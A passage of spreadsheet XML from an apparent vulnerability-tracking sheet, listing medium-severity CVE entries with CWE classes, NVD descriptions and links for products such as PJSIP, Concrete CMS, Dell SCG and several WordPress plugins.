          <t>Newly scored</t>
        </is>
      </c>
      <c r="C806" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57166</t>
        </is>
      </c>
      <c r="D806" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E806" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F806" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G806" s="5" t="inlineStr"/>
      <c r="H806" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I806" s="5" t="inlineStr"/>
      <c r="J806" s="5" t="inlineStr"/>
      <c r="K806" s="5" t="inlineStr">
        <is>
          <t>teluu:pjsip</t>
        </is>
      </c>
      <c r="L806" s="5" t="inlineStr"/>
      <c r="M806" s="5" t="inlineStr"/>
      <c r="N806" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O806" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P806" s="5" t="inlineStr"/>
      <c r="Q806" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R806" s="5" t="inlineStr">
        <is>
          <t>PJSIP is a free and open source multimedia communication library written in C. Prior to commit 4472a31, a stack buffer overflow exists in the PJLIB-UTIL telnet CLI front-end when rendering feedback for an entered command line. Several command-line handling paths write an attacker-influenced amount of data into fixed-size buffers without sufficient bounds checking, so a long command line can overflow them. This affects only applications that enable the telnet CLI front-end (e.g. pj_cli_telnet_create() / --cli-telnet-port). The telnet CLI is an interactive administration interface with no authentication, so any client able to reach it can already issue arbitrary CLI commands. A malformed or overly long command line can overflow a fixed-size stack buffer while rendering command-line feedback, which may lead to application termination. Because reaching this code already requires access to the unauthenticated CLI, the impact beyond that existing access is limited. Applications that do not enable the telnet CLI front-end are not affected. This issue has been patched via commit 4472a31.</t>
        </is>
      </c>
      <c r="S806" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57166</t>
        </is>
      </c>
    </row>
    <row r="807">
      <c r="A807" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B807" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C807" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62088</t>
        </is>
      </c>
      <c r="D807" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E807" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F807" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G807" s="5" t="inlineStr"/>
      <c r="H807" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I807" s="5" t="inlineStr"/>
      <c r="J807" s="5" t="inlineStr">
        <is>
          <t>elastic</t>
        </is>
      </c>
      <c r="K807" s="5" t="inlineStr"/>
      <c r="L807" s="5" t="inlineStr"/>
      <c r="M807" s="5" t="inlineStr"/>
      <c r="N807" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O807" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P807" s="5" t="inlineStr"/>
      <c r="Q807" s="5" t="inlineStr">
        <is>
          <t>CWE-201</t>
        </is>
      </c>
      <c r="R807" s="5" t="inlineStr">
        <is>
          <t>Insertion of Sensitive Information Into Sent Data vulnerability in 10up ElasticPress allows Retrieve Embedded Sensitive Data.
This issue affects ElasticPress: from n/a through 5.3.4.</t>
        </is>
      </c>
      <c r="S807" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62088</t>
        </is>
      </c>
    </row>
    <row r="808">
      <c r="A808" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B808" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C808" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62114</t>
        </is>
      </c>
      <c r="D808" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E808" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F808" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G808" s="5" t="inlineStr"/>
      <c r="H808" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I808" s="5" t="inlineStr"/>
      <c r="J808" s="5" t="inlineStr"/>
      <c r="K808" s="5" t="inlineStr"/>
      <c r="L808" s="5" t="inlineStr"/>
      <c r="M808" s="5" t="inlineStr"/>
      <c r="N808" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O808" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P808" s="5" t="inlineStr"/>
      <c r="Q808" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R808" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Access Control in Passster &lt;= 4.3.13 versions.</t>
        </is>
      </c>
      <c r="S808" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62114</t>
        </is>
      </c>
    </row>
    <row r="809">
      <c r="A809" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B809" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C809" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62132</t>
        </is>
      </c>
      <c r="D809" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E809" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F809" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G809" s="5" t="inlineStr"/>
      <c r="H809" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I809" s="5" t="inlineStr"/>
      <c r="J809" s="5" t="inlineStr"/>
      <c r="K809" s="5" t="inlineStr"/>
      <c r="L809" s="5" t="inlineStr"/>
      <c r="M809" s="5" t="inlineStr"/>
      <c r="N809" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O809" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P809" s="5" t="inlineStr"/>
      <c r="Q809" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R809" s="5" t="inlineStr">
        <is>
          <t>Subscriber Broken Access Control in Masteriyo - LMS &lt;= 3.4.0 versions.</t>
        </is>
      </c>
      <c r="S809" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62132</t>
        </is>
      </c>
    </row>
    <row r="810">
      <c r="A810" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B810" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C810" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62135</t>
        </is>
      </c>
      <c r="D810" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E810" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F810" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G810" s="5" t="inlineStr"/>
      <c r="H810" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I810" s="5" t="inlineStr"/>
      <c r="J810" s="5" t="inlineStr"/>
      <c r="K810" s="5" t="inlineStr"/>
      <c r="L810" s="5" t="inlineStr"/>
      <c r="M810" s="5" t="inlineStr"/>
      <c r="N810" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O810" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P810" s="5" t="inlineStr"/>
      <c r="Q810" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R810" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Access Control in Booktics &lt;= 1.0.24 versions.</t>
        </is>
      </c>
      <c r="S810" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62135</t>
        </is>
      </c>
    </row>
    <row r="811">
      <c r="A811" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B811" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C811" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62136</t>
        </is>
      </c>
      <c r="D811" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E811" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F811" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G811" s="5" t="inlineStr"/>
      <c r="H811" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I811" s="5" t="inlineStr"/>
      <c r="J811" s="5" t="inlineStr"/>
      <c r="K811" s="5" t="inlineStr"/>
      <c r="L811" s="5" t="inlineStr"/>
      <c r="M811" s="5" t="inlineStr"/>
      <c r="N811" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O811" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P811" s="5" t="inlineStr"/>
      <c r="Q811" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R811" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Access Control in Flexible Quantity – Measurement Price Calculator for WooCommerce &lt;= 2.3.21 versions.</t>
        </is>
      </c>
      <c r="S811" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62136</t>
        </is>
      </c>
    </row>
    <row r="812">
      <c r="A812" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B812" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C812" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62137</t>
        </is>
      </c>
      <c r="D812" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E812" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F812" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G812" s="5" t="inlineStr"/>
      <c r="H812" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I812" s="5" t="inlineStr"/>
      <c r="J812" s="5" t="inlineStr"/>
      <c r="K812" s="5" t="inlineStr"/>
      <c r="L812" s="5" t="inlineStr"/>
      <c r="M812" s="5" t="inlineStr"/>
      <c r="N812" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O812" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P812" s="5" t="inlineStr"/>
      <c r="Q812" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R812" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Sensitive Data Exposure in bbPress &lt;= 2.6.14 versions.</t>
        </is>
      </c>
      <c r="S812" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62137</t>
        </is>
      </c>
    </row>
    <row r="813">
      <c r="A813" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B813" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C813" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62140</t>
        </is>
      </c>
      <c r="D813" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E813" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F813" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G813" s="5" t="inlineStr"/>
      <c r="H813" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I813" s="5" t="inlineStr"/>
      <c r="J813" s="5" t="inlineStr"/>
      <c r="K813" s="5" t="inlineStr"/>
      <c r="L813" s="5" t="inlineStr"/>
      <c r="M813" s="5" t="inlineStr"/>
      <c r="N813" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O813" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P813" s="5" t="inlineStr"/>
      <c r="Q813" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R813" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Insecure Direct Object References (IDOR) in Quiz And Survey Master &lt;= 11.2.5 versions.</t>
        </is>
      </c>
      <c r="S813" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62140</t>
        </is>
      </c>
    </row>
    <row r="814">
      <c r="A814" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B814" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C814" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68526</t>
        </is>
      </c>
      <c r="D814" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E814" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F814" s="5" t="inlineStr">
        <is>
          <t>ff5b8ace-8b95-4078-9743-eac1ca5451de</t>
        </is>
      </c>
      <c r="G814" s="5" t="inlineStr"/>
      <c r="H814" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I814" s="5" t="inlineStr"/>
      <c r="J814" s="5" t="inlineStr"/>
      <c r="K814" s="5" t="inlineStr"/>
      <c r="L814" s="5" t="inlineStr"/>
      <c r="M814" s="5" t="inlineStr"/>
      <c r="N814" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O814" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P814" s="5" t="inlineStr"/>
      <c r="Q814" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="R814" s="5" t="inlineStr">
        <is>
          <t>Concrete CMS before 9.5.3 did not validate an anti-CSRF token in the Calendar event duplicate dialog controller (concrete/controllers/dialog/event/duplicate.php) submit() action, which duplicated a calendar event after checking only canAccess() and the per-resource canAddCalendarEvent() permission, so a crafted cross-site request could cause an authenticated user with add-event permission to create duplicate CalendarEvents and CalendarEventVersions records under their own authority. The Concrete CMS security team gave this vulnerability a CVSS v4.0 score of 5.3 with vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Winston Crooker for reporting.</t>
        </is>
      </c>
      <c r="S814" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68526</t>
        </is>
      </c>
    </row>
    <row r="815">
      <c r="A815" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B815" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C815" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78446</t>
        </is>
      </c>
      <c r="D815" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E815" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F815" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G815" s="5" t="inlineStr"/>
      <c r="H815" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I815" s="5" t="inlineStr"/>
      <c r="J815" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K81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15" s="5" t="inlineStr"/>
      <c r="M815" s="5" t="inlineStr"/>
      <c r="N815" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O815" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P815" s="5" t="inlineStr"/>
      <c r="Q815" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R815" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Distributed File System (DFS) allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S815" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78446</t>
        </is>
      </c>
    </row>
    <row r="816">
      <c r="A816" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B816" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C816" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79741</t>
        </is>
      </c>
      <c r="D816" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E816" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F816" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G816" s="5" t="inlineStr"/>
      <c r="H816" s="5" t="n">
        <v>0.015</v>
      </c>
      <c r="I816" s="5" t="inlineStr"/>
      <c r="J816" s="5" t="inlineStr"/>
      <c r="K816" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L816" s="5" t="inlineStr"/>
      <c r="M816" s="5" t="inlineStr"/>
      <c r="N816" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O816" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P816" s="5" t="inlineStr"/>
      <c r="Q816" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="R816" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to script injection.</t>
        </is>
      </c>
      <c r="S816" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79741</t>
        </is>
      </c>
    </row>
    <row r="817">
      <c r="A817" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B817" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C817" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80135</t>
        </is>
      </c>
      <c r="D817" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E817" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F817" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G817" s="5" t="inlineStr"/>
      <c r="H817" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I817" s="5" t="inlineStr"/>
      <c r="J817" s="5" t="inlineStr"/>
      <c r="K817" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L817" s="5" t="inlineStr"/>
      <c r="M817" s="5" t="inlineStr"/>
      <c r="N817" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O817" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P817" s="5" t="inlineStr"/>
      <c r="Q817" s="5" t="inlineStr">
        <is>
          <t>CWE-703</t>
        </is>
      </c>
      <c r="R817" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Check or Handling of Exceptional Conditions vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to protection mechanism bypass.</t>
        </is>
      </c>
      <c r="S817" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80135</t>
        </is>
      </c>
    </row>
    <row r="818">
      <c r="A818" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B818" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C818" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81913</t>
        </is>
      </c>
      <c r="D818" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E818" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F818" s="5" t="inlineStr">
        <is>
          <t>ff5b8ace-8b95-4078-9743-eac1ca5451de</t>
        </is>
      </c>
      <c r="G818" s="5" t="inlineStr"/>
      <c r="H818" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I818" s="5" t="inlineStr"/>
      <c r="J818" s="5" t="inlineStr"/>
      <c r="K818" s="5" t="inlineStr"/>
      <c r="L818" s="5" t="inlineStr"/>
      <c r="M818" s="5" t="inlineStr"/>
      <c r="N818" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O818" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P818" s="5" t="inlineStr"/>
      <c r="Q818" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="R818" s="5" t="inlineStr">
        <is>
          <t>Concrete CMS versions 9.5.0 through 9.5.2 are vulnerable to Open Redirect via the rcURL parameter. An attacker can craft a single link on the site's own domain that sends a user to an arbitrary external site immediately after authentication, facilitating phishing and credential theft. The same handling is present in the registration flow, giving a second entry point on sites with registration enabled. Concrete CMS versions prior to 9.5.0 do not include the rcURL parameter or this allowlist and are not affected. The Concrete CMS security team gave this vulnerability a CVSS v4.0 score of 5.3 with vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Michal M. for reporting.</t>
        </is>
      </c>
      <c r="S818" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81913</t>
        </is>
      </c>
    </row>
    <row r="819">
      <c r="A819" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B819" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C819" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82213</t>
        </is>
      </c>
      <c r="D819" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E819" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F819" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G819" s="5" t="inlineStr"/>
      <c r="H819" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I819" s="5" t="inlineStr"/>
      <c r="J819" s="5" t="inlineStr"/>
      <c r="K819" s="5" t="inlineStr"/>
      <c r="L819" s="5" t="inlineStr"/>
      <c r="M819" s="5" t="inlineStr"/>
      <c r="N819" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O819" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P819" s="5" t="inlineStr"/>
      <c r="Q819" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R819" s="5" t="inlineStr">
        <is>
          <t>The Nexi XPay Build WordPress plugin from 7.6.1 to 7.6.2 does not verify that the saved payment token being requested belongs to the current user, allowing unauthenticated attackers to retrieve other customers' stored card token references together with a valid authorisation signature.</t>
        </is>
      </c>
      <c r="S819" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82213</t>
        </is>
      </c>
    </row>
    <row r="820">
      <c r="A820" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B820" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C820" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82305</t>
        </is>
      </c>
      <c r="D820" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E820" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F820" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G820" s="5" t="inlineStr"/>
      <c r="H820" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I820" s="5" t="inlineStr"/>
      <c r="J820" s="5" t="inlineStr"/>
      <c r="K820" s="5" t="inlineStr"/>
      <c r="L820" s="5" t="inlineStr"/>
      <c r="M820" s="5" t="inlineStr"/>
      <c r="N820" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O820" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P820" s="5" t="inlineStr"/>
      <c r="Q820" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R820" s="5" t="inlineStr">
        <is>
          <t>The YITH WooCommerce Wishlist WordPress plugin before 4.18.1 does not verify that a user is authorised to rename a given wishlist, allowing unauthenticated users to rename any wishlist on the site.</t>
        </is>
      </c>
      <c r="S820" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82305</t>
        </is>
      </c>
    </row>
    <row r="821">
      <c r="A821" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B821" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C821" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82535</t>
        </is>
      </c>
      <c r="D821" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E821" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F821" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G821" s="5" t="inlineStr"/>
      <c r="H821" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I821" s="5" t="inlineStr"/>
      <c r="J821" s="5" t="inlineStr"/>
      <c r="K821" s="5" t="inlineStr"/>
      <c r="L821" s="5" t="inlineStr"/>
      <c r="M821" s="5" t="inlineStr"/>
      <c r="N821" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O821" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P821" s="5" t="inlineStr"/>
      <c r="Q821" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R821" s="5" t="inlineStr">
        <is>
          <t>Chamilo LMS before 1.11.42 and 3.0.0 contains a stored cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious script payloads into survey answers by computing deterministic invitation codes and bypassing authorization checks in the survey submission endpoint. Attackers can submit crafted answers containing unescaped HTML rendered in reporting views to execute arbitrary scripts in the browser sessions of teachers or administrators, enabling persistent backdoor account creation by exploiting the victim's authenticated session.</t>
        </is>
      </c>
      <c r="S821" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82535</t>
        </is>
      </c>
    </row>
    <row r="822">
      <c r="A822" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B822" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C822" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86781</t>
        </is>
      </c>
      <c r="D822" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E822" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F822" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G822" s="5" t="inlineStr"/>
      <c r="H822" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I822" s="5" t="inlineStr"/>
      <c r="J822" s="5" t="inlineStr"/>
      <c r="K822" s="5" t="inlineStr"/>
      <c r="L822" s="5" t="inlineStr"/>
      <c r="M822" s="5" t="inlineStr"/>
      <c r="N822" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O822" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P822" s="5" t="inlineStr"/>
      <c r="Q822" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R822" s="5" t="inlineStr">
        <is>
          <t>The SSL Zen — SSL Certificate Installer &amp; HTTPS Redirects WordPress plugin before 4.7.40 does not perform capability or nonce checks on a certificate-file download routine that runs early in the WordPress admin request lifecycle, allowing any authenticated user, including Subscribers, to download the site's TLS private key, certificates, and diagnostic logs.</t>
        </is>
      </c>
      <c r="S822" s="6" t="inlineStr">
        <is>
